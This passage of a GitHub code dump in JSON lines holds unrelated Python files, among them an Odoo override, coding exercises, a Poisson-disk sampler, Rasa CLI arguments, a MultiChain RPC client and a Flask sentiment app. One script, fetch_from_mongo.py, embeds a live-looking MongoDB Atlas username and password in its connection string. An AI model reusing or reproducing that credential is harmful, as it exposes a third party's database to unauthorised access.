super(SaleOrderLine, self)._prepare_invoice_line(**optional_values)\n        if self.promotion_account_id and self.product_id:\n            values['name'] = self.product_id.name_get()[0][1]\n            values['promotion_id'] = self.promotion_id.id\n            values['promotion_account_id'] = self.promotion_account_id.id\n        return values\n","repo_name":"zawnainglinn1996/food","sub_path":"promotion_program/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42396453587","text":"\"\"\" String rearrangement\nA string made up only of uppercase letters and the digits 0~9 is given as input.\nPrint every letter sorted in ascending order, then print the sum of all the digits right after.\nPrint the required answer \"\"\"\ns = input()\nstring_result =[]\nint_result =[]\ncheck_integer = ['0','1','2','3','4','5','6','7','8','9']\nfor i in s:\n    if i in check_integer:\n        int_result.append(int(i))\n    else:\n        string_result.append(i) \nstring_result.sort()\nfor i in string_result:\n    print(i,end='')\nprint(sum(int_result))\n","repo_name":"LEEILHO/Coding_Test","sub_path":"이것이코딩테스트다/quiz08.py","file_name":"quiz08.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21694974946","text":"# Python provides a number of built-in functions and standard libraries \n# to use functions from a standard library we need to import its module\n\n# for example: the randint() function lives in the random module\n\nimport random\n\nrandomNumber = random.randint(20,30)\nprint(randomNumber)\n\n# we can import multiple modules in one line \n\n# import random , sys , os , math \n\n# another way to import the module is : from random import *\n\nimport sys\n\nprint('statement before the exit statement')\n\nsys.exit()\n\n# everything below is never reached: sys.exit() terminates the script above\nprint('statement after the exit statement')\n\nimport pyperclip\n\npyperclip.copy('hello world')\npyperclip.paste()","repo_name":"rosharma09/PythonBasics","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31601187777","text":"\"\"\"Bridson sampling\n\nReferences: Robert Bridson, Fast Poisson Disk Sampling in Arbitrary Dimensions, SIGGRAPH, 2007\n\nWritten by Sanghun Jee and Sungho Hong\nSupervised by Erik De Schutter\nComputational Neuroscience Unit,\nOkinawa Institute of Science and Technology\n\nMarch, 2020\n\"\"\"\n\nimport numpy as np\n\nfrom functools import partial\nfrom tqdm.autonotebook import tqdm\nfrom sklearn.neighbors import KDTree, NearestNeighbors\n\nfrom .utils import PointCloud\n\n\ndef make_2d_grid(sizeI, cellsize):\n    return np.mgrid[0 : sizeI[0] : cellsize, 0 : sizeI[1] : cellsize]\n\n\ndef make_3d_grid(sizeI, cellsize):\n    return np.mgrid[\n        0 : sizeI[0] : cellsize, 0 : sizeI[1] : cellsize, 0 : sizeI[2] : cellsize\n    ]\n\n\ndef set_nDarts(nPts, n_pts_created, n_pts_newly_created, nEmptyGrid, dartFactor=4):\n    n_to_create = nPts - n_pts_created\n    # if n_pts_newly_created==0:\n    #\n    # else:\n    #     ndarts = n_pts_newly_created*2\n    ndarts = np.min([nPts / dartFactor, nEmptyGrid / dartFactor])\n    # ndarts = np.max([n_to_create, nPts / dartFactor])\n    return int(np.round(ndarts))\n\n\ndef bridson_sampling(\n    fgrid,\n    sizeI,\n    spacing,\n    nPts,\n    showIter,\n    ftests=[],\n    discount_factor=0.5,\n    stopping_criterion=\"density\",\n):\n    count = 0\n    count_time = []\n    elapsed_time = []\n\n    # Setting properties of iteration\n    ndim = len(sizeI)\n    cellsize = spacing / np.sqrt(ndim)\n\n    # Make grid 
size such that there is just one pt in each grid\n dgrid = spacing / np.sqrt(ndim)\n\n # Make a grid and convert it into a nxD array\n sGrid_nd = fgrid(sizeI, cellsize)\n\n sGrid = np.array([sGrid_nd[i][:].flatten() for i in range(ndim)]).T\n del sGrid_nd\n\n # Thrown in a particular grid\n nEmptyGrid = nEmptyGrid0 = sGrid.shape[0]\n scoreGrid = np.ones(sGrid.shape[0])\n\n # Initialize Parameters\n if nPts == 0:\n nPts = nEmptyGrid\n n_pts_created = 0\n n_pts_newly_created = 0\n pts = np.empty(shape=(1, ndim))\n iter = 0\n\n # Start Iterative process\n\n pcl = PointCloud(pts, spacing)\n nn2 = NearestNeighbors(radius=spacing)\n\n if ftests != []:\n print(\"Testing coverage of cells...\")\n is_cell_uncovered = np.ones(sGrid.shape[0], dtype=bool)\n for ftest in ftests:\n is_cell_uncovered = ftest.test_cells(sGrid, dgrid)\n\n sGrid = sGrid[is_cell_uncovered, :]\n scoreGrid = scoreGrid[is_cell_uncovered]\n nEmptyGrid = np.sum(sGrid.shape[0])\n print(\"Uncovered cells: {}%\\n\".format(nEmptyGrid / nEmptyGrid0 * 100))\n\n if showIter:\n pbar = tqdm(total=nPts)\n pbar_grid = tqdm(total=nEmptyGrid0)\n pbar_grid.update(nEmptyGrid0 - nEmptyGrid)\n\n if stopping_criterion != 'density':\n raise RuntimeError('Bridson sampling allows only the density-based stopping criterion')\n\n while n_pts_created < nPts and nEmptyGrid > 0:\n # Thrown darts in eligible grids\n # availGrid, = np.where(is_grid_empty)\n # score_availGrid = scoreGrid[availGrid]\n scoreGrid = scoreGrid / scoreGrid.sum()\n\n ndarts = set_nDarts(nPts, n_pts_created, n_pts_newly_created, nEmptyGrid)\n if ndarts != sGrid.shape[0]:\n p = np.random.choice(\n range(sGrid.shape[0]), ndarts, replace=False, p=scoreGrid\n )\n tempPts = sGrid[p, :] + dgrid * np.random.rand(len(p), ndim)\n else:\n tempPts = sGrid + dgrid * np.random.rand(len(ndarts), ndim)\n\n # withinI = np.array([tempPts[:, i] < sizeI[i] for i in range(ndim)]).T\n # withinI = np.array([np.prod(x) for x in withinI])\n # eligiblePts = (withinI>0)*(D>spacing)*(Dist > 10)\n\n is_safe_to_continue = 1\n\n if ftests != []:\n is_safe_with_prev_pts = np.ones(len(p), dtype=bool)\n for ftest in ftests:\n is_safe_with_prev_pts = is_safe_with_prev_pts * ftest.test_points(\n tempPts\n )\n\n is_safe_to_continue = np.sum(is_safe_with_prev_pts)\n rejected_grids = p[~is_safe_with_prev_pts]\n scoreGrid[rejected_grids] = scoreGrid[rejected_grids] * discount_factor\n\n p = p[is_safe_with_prev_pts]\n tempPts = tempPts[is_safe_with_prev_pts, :]\n\n if is_safe_to_continue > 0 and n_pts_created > 0:\n # check with previously generated points\n # is_safe_with_prev_pts = np.frompyfunc(lambda x: x.size == 0, 1, 1)(\n # nn1.radius_neighbors(tempPts, return_distance=False)\n # ).astype(bool)\n is_safe_with_prev_pts = pcl.test_points(tempPts)\n is_safe_to_continue = np.sum(is_safe_with_prev_pts)\n rejected_grids = p[~is_safe_with_prev_pts]\n scoreGrid[rejected_grids] = scoreGrid[rejected_grids] * discount_factor\n\n p = p[is_safe_with_prev_pts]\n tempPts = tempPts[is_safe_with_prev_pts, :]\n\n if is_safe_to_continue > 0:\n # find colliding pairs and leave only one of the pairs\n nn2.fit(tempPts)\n ind = nn2.radius_neighbors(tempPts, return_distance=False)\n\n # ind = KDTree(tempPts).query_radius(tempPts, r=spacing)\n is_eligible = np.frompyfunc(lambda i: (ind[i] < i).sum() == 0, 1, 1)(\n np.arange(ind.size)\n ).astype(bool)\n\n accepted_pts = tempPts[is_eligible, :]\n\n accepted_grids = p[is_eligible]\n rejected_grids = p[~is_eligible]\n remaining_grids = np.setdiff1d(range(sGrid.shape[0]), accepted_grids)\n\n 
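            # Illustration of the np.setdiff1d call above (hypothetical values):
            # np.setdiff1d(range(5), [1, 3]) -> array([0, 2, 4]); only the grid
            # cells whose index was not just accepted survive into sGrid below.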
sGrid = sGrid[remaining_grids, :]\n # scoreGrid[rejected_grids] = scoreGrid[rejected_grids] * discount_factor\n scoreGrid = scoreGrid[remaining_grids]\n\n n_pts_newly_created = accepted_pts.shape[0]\n if n_pts_newly_created > 0:\n # Update quantities for next iterations\n nEmptyGrid = sGrid.shape[0]\n if n_pts_created == 0:\n pcl.update_points(accepted_pts)\n else:\n pcl.append_points(accepted_pts)\n\n n_pts_created = pcl.points.shape[0]\n\n if showIter:\n pbar.update(n_pts_newly_created)\n pbar_grid.update(n_pts_newly_created)\n\n iter += 1\n\n pts = pcl.points\n if pts.shape[0] > nPts:\n p = np.arange(pts.shape[0])\n p = np.random.choice(p, nPts, replace=False)\n pts = pts[p, :]\n\n if showIter:\n pbar.close()\n pbar_grid.close()\n print(\n \"\\nIteration: {}, (final)Points Created: {}, is_grid_empty:{} ({}%)\".format(\n iter, pts.shape[0], nEmptyGrid, nEmptyGrid / nEmptyGrid0 * 100\n )\n )\n return pts\n\n\nBridson_sampling_2d = partial(bridson_sampling, make_2d_grid)\n\nBridson_sampling_3d = partial(bridson_sampling, make_3d_grid)\n","repo_name":"CNS-OIST/pycabnn","sub_path":"pycabnn/pop_generation/bridson.py","file_name":"bridson.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"33784897503","text":"class Solution:\n def beautifulPartitions(self, s: str, k: int, minLength: int) -> int:\n n = len(s)\n mod = 10**9 + 7\n primes = (\"2\", \"3\", \"5\", \"7\")\n \n if s[0] not in primes or s[-1] in primes: return 0\n \n can_break = [i>0 and s[i] in primes and s[i-1] not in primes for i in range(n)]\n \n dp_prev = [1] * (n)\n dp = [0] * n\n \n \n for p in range(1, k):\n if p == 2:\n for r in range(minLength):\n dp[r] = 0\n for r in range(minLength, n):\n if can_break[r]:\n dp[r] = (dp[r-1] + dp_prev[r-minLength])%mod\n else:\n dp[r] = dp[r-1]\n # print(dp)\n dp, dp_prev = dp_prev, dp \n \n return dp_prev[-minLength]","repo_name":"mdakram28/leetcode-archive","sub_path":"my-folder/problems/number_of_beautiful_partitions/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29279416406","text":"def main():\n '''\n A = Rock | B = Paper | C = Scissors\n X = Lose | Y = Draw | Z = Win\n '''\n score = 0\n with open('input2.txt') as game_input:\n for game in game_input:\n outcome = game_outcome[game.strip()]\n score += (outcome[\"wl\"] + outcome[\"ps\"])\n\n print(f'total: {score}')\n\n\ngame_outcome = {\n 'A X': { 'wl': 0, 'ps': 3,},\n 'A Y': { 'wl': 3, 'ps': 1,},\n 'A Z': { 'wl': 6, 'ps': 2,},\n 'B X': { 'wl': 0, 'ps': 1,},\n 'B Y': { 'wl': 3, 'ps': 2,},\n 'B Z': { 'wl': 6, 'ps': 3,},\n 'C X': { 'wl': 0, 'ps': 2,},\n 'C Y': { 'wl': 3, 'ps': 3,},\n 'C Z': { 'wl': 6, 'ps': 1,},\n}\n\nif __name__ == '__main__':\n main()","repo_name":"absenth/advent-of-code","sub_path":"2022-Advent_of_code/2022-12-02/challenge2b.py","file_name":"challenge2b.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13928264475","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 8 14:42:06 2020\n\n@author: Nick1\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os\nfrom .getevents import read_events\nfrom termcolor import colored\n\ndef calcStateSpace(sig,events,fs,n_dim,delay):\n# 
=============================================================================\n#    Calculate state space using n_dimension with time delay [delay] in samples\n# =============================================================================\n    from scipy.interpolate import interp1d\n    print(\"creating state space...\")\n    # make sorted heel strike list\n    lhs = np.array(events.l_heel_strike)*fs\n    rhs = np.array(events.r_heel_strike)*fs\n    meve = np.array([])\n    arr_ieve = np.hstack((rhs,lhs))\n    arr_neve = np.hstack((np.zeros(rhs.shape),np.ones(lhs.shape)))\n    meve = np.vstack((arr_ieve,arr_neve))\n    meve = meve[:,meve[0,:].argsort()]\n    # get number of strides and samples\n    n_samples = (meve.shape[1]-1)*100\n    # new signal without the samples before the first and after the last event\n    idx_truesamp = int(meve[0,0]-1)\n    idx_tail = int(meve[0,-1]-1)\n    #idx_cut = np.hstack((np.zeros(int(meve[0,0])),np.ones(n_truesamp),np.zeros(n_tail)))\n#    sig_new = np.vstack((com.COMx,com.COMy,com.COMz))\n    sig_new = sig[idx_truesamp:idx_tail]\n    t_new = np.linspace(0,1,sig_new.shape[0])\n    t_inter = np.linspace(0,1,n_samples)\n    # slightly different from Sjoerd's method (does not extrapolate data)\n    fsig_int = interp1d(t_new,sig_new,kind = 'cubic')\n    sig_int = fsig_int(t_inter)\n    # create empty statespace array\n    state = np.zeros([n_samples-(n_dim-1)*delay,n_dim])\n    #create the state space now:\n    for i_dim in range(n_dim):\n        idx_start = (i_dim)*delay\n        idx_stop = n_samples-(n_dim-i_dim-1)*delay\n        state[:,i_dim] = sig_int[idx_start:idx_stop]\n    return state\n\n\ndef calcLDE(state,ws,fs,period,nnbs):\n# =============================================================================\n#     Calculate Local Divergence Exponent\n# =============================================================================\n    win = np.round(ws*fs)\n    [m,n] = state.shape\n    state = np.vstack((state,np.zeros([int(win),int(n)])*np.nan))\n    divmat = np.zeros([int(m*nnbs),int(win)])*np.nan\n    difmat = np.zeros([int(m+win),int(n)])*np.nan\n    L1 = .5*period*fs\n    print('Calculating local divergence ...')\n    sys.stdout.write(\"[%s]\" % (\".\" * 10))\n    sys.stdout.flush()\n    sys.stdout.write(\"\\b\" * (10+1))\n    steps = 9\n    for i_t in range(m):\n        if np.greater_equal((i_t/m)*100,steps):\n            sys.stdout.write(\"#\")\n            sys.stdout.flush()\n            steps =steps+10\n        for i_d in range(n):\n            difmat[:,i_d] = (np.subtract(state[:,i_d],state[i_t,i_d]))**2\n        arridx1 = np.array([1,i_t-np.round(L1)])\n        arridx2 = np.array([m,i_t+np.round(L1)])\n        idx_start = int(np.round(np.amax(arridx1))-1)\n        idx_stop = int(np.round(np.amin(arridx2))-1)\n        difmat[idx_start:idx_stop] = difmat[idx_start:idx_stop]*np.nan\n        idx_sort = np.sum(difmat,1).argsort()\n        for i_nn in range(nnbs):\n            div_tmp = np.subtract(state[i_t:i_t+int(win),:],state[idx_sort[i_nn]:(idx_sort[i_nn]+int(win)),:])\n            divmat[i_t*nnbs+i_nn,:] = np.sum(div_tmp**2,1)**.5 # track divergence, and store\n    sys.stdout.write(\"]\\n\") # end progress bar\n    divergence = np.nanmean(np.log(divmat),0)\n    xdiv = np.linspace(1,divergence.shape[0],divergence.shape[0])/fs\n    xs = xdiv[1:int(np.floor(L1))]\n    Ps = np.polynomial.polynomial.polyfit(xs,divergence[1:int(np.floor(L1))],1)\n\n    lde = np.ones([1,2])*np.nan\n    lde[0] = Ps[1]\n\n    L2 = np.round(4*period*fs)\n    if L2 < win:\n        idxl = (np.linspace(0,win-L2-1,int(win-L2))+int(L2))\n        Pl = np.polynomial.Polynomial.fit(idxl/fs,divergence[int(idxl[0]):int(idxl[-1])],1)\n        lde[1] = Pl[1]\n    return divergence,lde\n\ndef store_result(file_out, value):\n    file = open(file_out, 'w')\n    file.write('---\\ntype: \\'scalar\\'\\nvalue: ' + format(round(value,2), '.5f')+'\\n')\n    
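    # For reference, with a hypothetical value of 0.57 the write above puts
    # this YAML on disk:
    #   ---
    #   type: 'scalar'
    #   value: 0.57000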
file.close()\n    return True\n\nUSAGE = \"\"\"usage: run_pi file_in_comTrajectories file_in_events folder_out\n>> file_in_comTrajectories: csv file containing the positional CoM data\n>> file_in_events: csv file containing the timing of gait events\n>> folder_out: folder where the PI yaml files will be stored\n\"\"\"\n\ndef main():\n    if len(sys.argv) != 4:\n        print(colored(\"Wrong input parameters!\", \"red\"))\n        print(colored(USAGE, \"yellow\"))\n        return -1\n\n    file_in_com = sys.argv[1]\n    file_in_events = sys.argv[2]\n    folder_out = sys.argv[3]\n\n\n    # check input parameters are good\n    if not os.path.exists(file_in_com):\n        print(colored(\"Input file {} does not exist\".format(file_in_com), \"red\"))\n        return -1\n    if not os.path.isfile(file_in_com):\n        print(colored(\"Input path {} is not a file\".format(file_in_com), \"red\"))\n        return -1\n    if not os.path.exists(file_in_events):\n        print(colored(\"Input file {} does not exist\".format(file_in_events), \"red\"))\n        return -1\n    if not os.path.isfile(file_in_events):\n        print(colored(\"Input path {} is not a file\".format(file_in_events), \"red\"))\n        return -1\n\n    if not os.path.exists(folder_out):\n        print(colored(\n            \"Output folder {} does not exist\".format(folder_out),\n            \"red\"))\n        return -1\n    if not os.path.isdir(folder_out):\n        print(colored(\"Output path {} is not a folder\".format(folder_out), \"red\"))\n        return -1\n\n    # load CoM data\n    com = pd.read_csv(file_in_com)\n    # load events structure\n    events = read_events(file_in_events)\n    # from com data calculate the sampling frequency\n    fs = 1/np.mean(np.diff(np.array(com.time)))\n    # parameters for the local divergence calculation\n    ws = 8\n    period = 2.04\n    nnbs = 4\n    ndim = 5\n    delay = 10\n    state = calcStateSpace(com.y,events,fs,ndim,delay)\n    diverg,locdiv = calcLDE(state,ws,fs,period,nnbs)\n    print(locdiv[0][0])\n    file_out0 = folder_out + \"/pi_LDE.yaml\"\n    if not store_result(file_out0, locdiv[0][0]):\n        return -1\n    print(colored(\n        \"local divergence exp.: {} stored in {}\".format(round(locdiv[0][0],2), file_out0),\n        \"green\"))\n    return 0\n\n\n\n\n\n","repo_name":"nickkluft/udbenchmark_PIs","sub_path":"src/pi_LDE/pi_LDE/localdivergence.py","file_name":"localdivergence.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34341531228","text":"import argparse\nfrom typing import Text\n\nfrom rasa.cli.arguments.default_arguments import (\n    add_nlu_data_param,\n    add_out_param,\n    add_data_param,\n    add_domain_param,\n)\nfrom rasa.shared.constants import DEFAULT_CONVERTED_DATA_PATH\n\n\ndef set_convert_arguments(parser: argparse.ArgumentParser, data_type: Text) -> None:\n    \"\"\"Sets convert command arguments.\"\"\"\n    parser.add_argument(\n        \"-f\",\n        \"--format\",\n        default=\"yaml\",\n        choices=[\"json\", \"yaml\"],\n        help=\"Output format the training data should be converted into.\",\n    )\n\n    add_data_param(parser, required=True, data_type=data_type)\n\n    add_out_param(\n        parser,\n        default=DEFAULT_CONVERTED_DATA_PATH,\n        help_text=\"File (for `json`) or existing path (for `yaml`) \"\n        \"where to save training data in Rasa format.\",\n    )\n\n    parser.add_argument(\"-l\", \"--language\", default=\"en\", help=\"Language of data.\")\n\n\ndef set_split_arguments(parser: argparse.ArgumentParser) -> None:\n    add_nlu_data_param(parser, help_text=\"File or folder containing your NLU 
data.\")\n\n parser.add_argument(\n \"--training-fraction\",\n type=float,\n default=0.8,\n help=\"Percentage of the data which should be in the training data.\",\n )\n\n parser.add_argument(\n \"--random-seed\",\n type=int,\n default=None,\n help=\"Seed to generate the same train/test split.\",\n )\n\n add_out_param(\n parser,\n default=\"train_test_split\",\n help_text=\"Directory where the split files should be stored.\",\n )\n\n\ndef set_validator_arguments(parser: argparse.ArgumentParser) -> None:\n parser.add_argument(\n \"--fail-on-warnings\",\n default=False,\n action=\"store_true\",\n help=\"Fail validation on warnings and errors. \"\n \"If omitted only errors will result in a non zero exit code.\",\n )\n add_domain_param(parser)\n add_data_param(parser)\n\n\ndef set_migrate_arguments(parser: argparse.ArgumentParser) -> None:\n \"\"\"Sets migrate command arguments.\"\"\"\n add_domain_param(parser)\n\n add_out_param(\n parser,\n default=None,\n help_text=\"Path (for `yaml`) where to save migrated domain in Rasa 3.0 format.\"\n \"If none is specified, either a `new_domain.yml` file or `new_domain` folder \"\n \"will be created in the folder that contains the given domain.\",\n )\n","repo_name":"RasaHQ/rasa","sub_path":"rasa/cli/arguments/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":17244,"dataset":"github-code","pt":"5"} +{"seq_id":"32133831986","text":"# python script to fetch data from the remote DB (MongoDB hosted on MongoDb Atlas) with query\n\nimport pymongo\n\nclient = pymongo.MongoClient(\"mongodb+srv://gatij:9nncz40BasoM5mmu@democluster.3tqjv.azure.mongodb.net/?retryWrites=true&w=majority\")\nmydb = client[\"BookstoreDb\"]\nmycol = mydb[\"Books\"]\nmyquery = {\"Category\" : \"Computers\"}\nmydoc = mycol.find(myquery)\nfor x in mydoc:\n\tprint(x)","repo_name":"gatij/handyScripts","sub_path":"fetch_from_mongo.py","file_name":"fetch_from_mongo.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36266594755","text":"\nfrom urllib import request\nfrom urllib import error\nimport base64\nimport json\nfrom collections import OrderedDict\nimport time\nimport ssl\n\ndefault_error_code = 502\n\nclass MultiChainClient:\n\n def __init__(self, host, port, username, password, usessl = False):\n self.host = host\n self.port = port\n self.username = username\n self.password = password\n self.usessl = usessl\n\n self.chainname = None\n self.verifyssl = True\n\n self.error_code = 0\n self.error_message = \"\"\n\n def setoption(self, option, value):\n\n if(option == \"chainname\"):\n self.chainname = value\n if(option == \"verifyssl\"):\n self.verifyssl = value\n\n def api_wrapper(self, method):\n\n def api_caller(*args):\n\n url=\"https\" if self.usessl else \"http\"\n\n url += \"://\" + self.host + \":\" + str(self.port)\n userpass64 = base64.b64encode((self.username + \":\" + self.password).encode(\"ascii\")).decode(\"ascii\")\n\n headers={\n \"Content-Type\" : \"application/json\",\n \"Connection\" : \"close\",\n \"Authorization\" : \"Basic \" + userpass64\n }\n\n api_request={\n \"id\" : int(round(time.time() * 1000)),\n \"method\" : method,\n \"params\" : args\n }\n\n if self.chainname:\n api_request[\"chain_name\"] = self.chainname\n\n payload=json.dumps(api_request)\n\n headers[\"Content-Length\"] = str(len(payload))\n\n try:\n data = str(payload)\n data = data.encode('utf-8')\n\n ureq = 
request.Request(url, data=data)\n\n                for header,value in headers.items():\n                    ureq.add_header(header, value)\n\n                if self.verifyssl:\n                    req = request.urlopen(ureq)\n                else:\n                    context = ssl._create_unverified_context()\n                    req = request.urlopen(ureq, context=context)\n\n            except error.HTTPError as e:\n\n                self.error_code = e.getcode()\n                self.error_message = e.reason\n\n                resp = e.read()\n\n                if resp:\n                    req_json=json.loads(resp.decode('utf-8'))\n                    if req_json['error'] is not None:\n                        self.error_code = req_json['error']['code']\n                        self.error_message = req_json['error']['message']\n                        if self.error_code == -1:\n                            if self.error_message.find(\"\\n\\n\") >= 0:\n                                self.error_message = \"Wrong parameters. Usage:\\n\\n\" + self.error_message\n\n                return None\n\n            except error.URLError as e:\n\n                self.error_code = default_error_code\n                self.error_message = str(e.reason)\n\n                return None\n\n            resp=req.read()\n            req_json=json.loads(resp.decode('utf-8'), object_pairs_hook=OrderedDict)\n\n            return req_json['result']\n\n        return api_caller\n\n    def __getattr__(self, method):\n        return self.api_wrapper(method)\n\n    def errorcode(self):\n        return self.error_code\n\n    def errormessage(self):\n        return self.error_message\n\n    def success(self):\n        return (self.error_code == 0)","repo_name":"Syed007Hassan/Fast-Material-CS-SE","sub_path":"6TH SEMESTER/Blockchain and Cryptocurrency/Labs/Lab5/multichain.py","file_name":"multichain.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"11039602499","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as fhandle:\n    long_description = fhandle.read()\n\n\nsetup(\n    name='pyansible',\n    version='1.0.3',\n    description='A module for interfacing with Ansible Runner and Inventory.',\n    long_description=long_description,\n    url=\"https://github.com/bdastur/spam\",\n    author=\"Behzad Dastur\",\n    author_email=\"bdastur@gmail.com\",\n    license='Apache Software License',\n    classifiers=[\n        'Development Status :: 3 - Alpha',\n        'Programming Language :: Python :: 2',\n        'Programming Language :: Python :: 2.6',\n        'Programming Language :: Python :: 2.7',\n        'Intended Audience :: Developers',\n        'License :: Apache Software License',\n        'Topic :: Software Development :: Libraries',\n        'Topic :: Utilities',\n        'License :: OSI Approved :: Apache Software License',\n        'Operating System :: POSIX :: Linux',\n        'Operating System :: MacOS',\n    ],\n\n    keywords='ansible',\n    packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n    install_requires=['rexutil',\n                      'MarkupSafe',\n                      'jinja2',\n                      'PyYAML',\n                      'ansible==1.9.4']\n)\n\n","repo_name":"bdastur/spam","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"22564695086","text":"from os import path, pardir\nfrom ecosystem_tests.dorkl import replace_plugin_package_on_manager\nfrom ecosystem_cicd_tools.validations import validate_plugin_version\n\nabs_path = path.join(\n    path.abspath(path.join(path.dirname(__file__), pardir)))\n\nif __name__ == '__main__':\n    version = validate_plugin_version(abs_path)\n    for package in ['cloudify_vcd', 'vcd_plugin_sdk']:\n        replace_plugin_package_on_manager(\n            'cloudify-vcloud-plugin', version, package, 
)\n","repo_name":"cloudify-cosmo/cloudify-vcloud-plugin","sub_path":".circleci/update_test_manager.py","file_name":"update_test_manager.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"30378179279","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('network_site', '0005_auto_20150526_1321'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='NetworkProt',\n            fields=[\n                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),\n                ('port_name', models.CharField(max_length=10)),\n                ('port_status', models.IntegerField(choices=[(1, 'trunk'), (2, 'access')])),\n                ('device', models.ForeignKey(to='network_site.NetworkEquipment')),\n                ('to_where', models.ForeignKey(to='network_site.Host')),\n            ],\n        ),\n        migrations.CreateModel(\n            name='Vlans',\n            fields=[\n                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),\n                ('vlan_id', models.PositiveSmallIntegerField(unique=True)),\n                ('name', models.CharField(max_length=32)),\n                ('desctiption', models.TextField()),\n            ],\n        ),\n        migrations.AddField(\n            model_name='networkprot',\n            name='vlans',\n            field=models.ManyToManyField(to='network_site.Vlans'),\n        ),\n        migrations.AlterUniqueTogether(\n            name='networkprot',\n            unique_together=set([('device', 'port_name')]),\n        ),\n    ]\n","repo_name":"HackBulgariaHackathon/Hackathon","sub_path":"pysuppl/network_site/migrations/0006_auto_20150526_1347.py","file_name":"0006_auto_20150526_1347.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16915910099","text":"from flask import Flask, jsonify, render_template, request\n\nfrom stanfordcorenlp import StanfordCoreNLP\nimport utils.wordpiece as wp\nfrom utils.vocab import Vocab\nimport nltk\nfrom nltk.sentiment import SentimentIntensityAnalyzer\npath = 'H:/a/nlp/stanford-corenlp-full-2018-10-05'\nnlp = StanfordCoreNLP(path, lang='en')\napp = Flask(__name__)\n# nltk.download('vader_lexicon') # download the sentiment lexicon\n\n# Route resolution: match the handler function to the path the user visits\n@app.route('/')\ndef index():\n    return render_template(\"index.html\")\n\n\n# Return the home page\n@app.route('/index')\ndef home():\n    return render_template(\"index.html\")\n\n\n# Return the movie page\n@app.route('/movie')\ndef movie():\n    sentence=request.args[\"sentence\"]\n    label=request.args[\"label\"]\n    print(sentence,label)\n    nullPage=[]\n    if sentence=='null':\n        return render_template(\"movie.html\", movies=nullPage)\n    l_dict=[]\n    lc='1\\tit is a beautiful nice day'\n    l_dict.append(lc)\n    judges = ''\n    triples = ''\n    op_dict = {}\n    vocab = Vocab()\n    vocab.load('utils/google_uncased_en_vocab.txt')\n    count_wp = 0\n    op_skip_list = []\n    ent_skip_list = []\n\n    for i in range(0, len(l_dict)):\n        # for i in range(1, 3):\n\n        s_label, s_content = label,sentence\n        if s_label == '0':\n            judges = 'bad'\n        if s_label == '1':\n            judges = 'good'\n        token = nlp.word_tokenize(s_content)\n        if i % 500 == 0:\n            print(i+1, ' examples, ', len(l_dict) - i, 'to go')\n        dependencyParse = nlp.dependency_parse(s_content)\n        pos = nlp.pos_tag(s_content)\n        # a1=nlp.pos_tag('apple')[0][1]\n        wptoken = wp.WordpieceTokenizer(vocab.i2w)\n        for i, begin, end in dependencyParse:\n            # print (i, '-'.join([str(begin), token[begin-1]]), '-'.join([str(end),token[end-1]]))\n            if i == 'amod' or i == 'nsubj':\n                if 
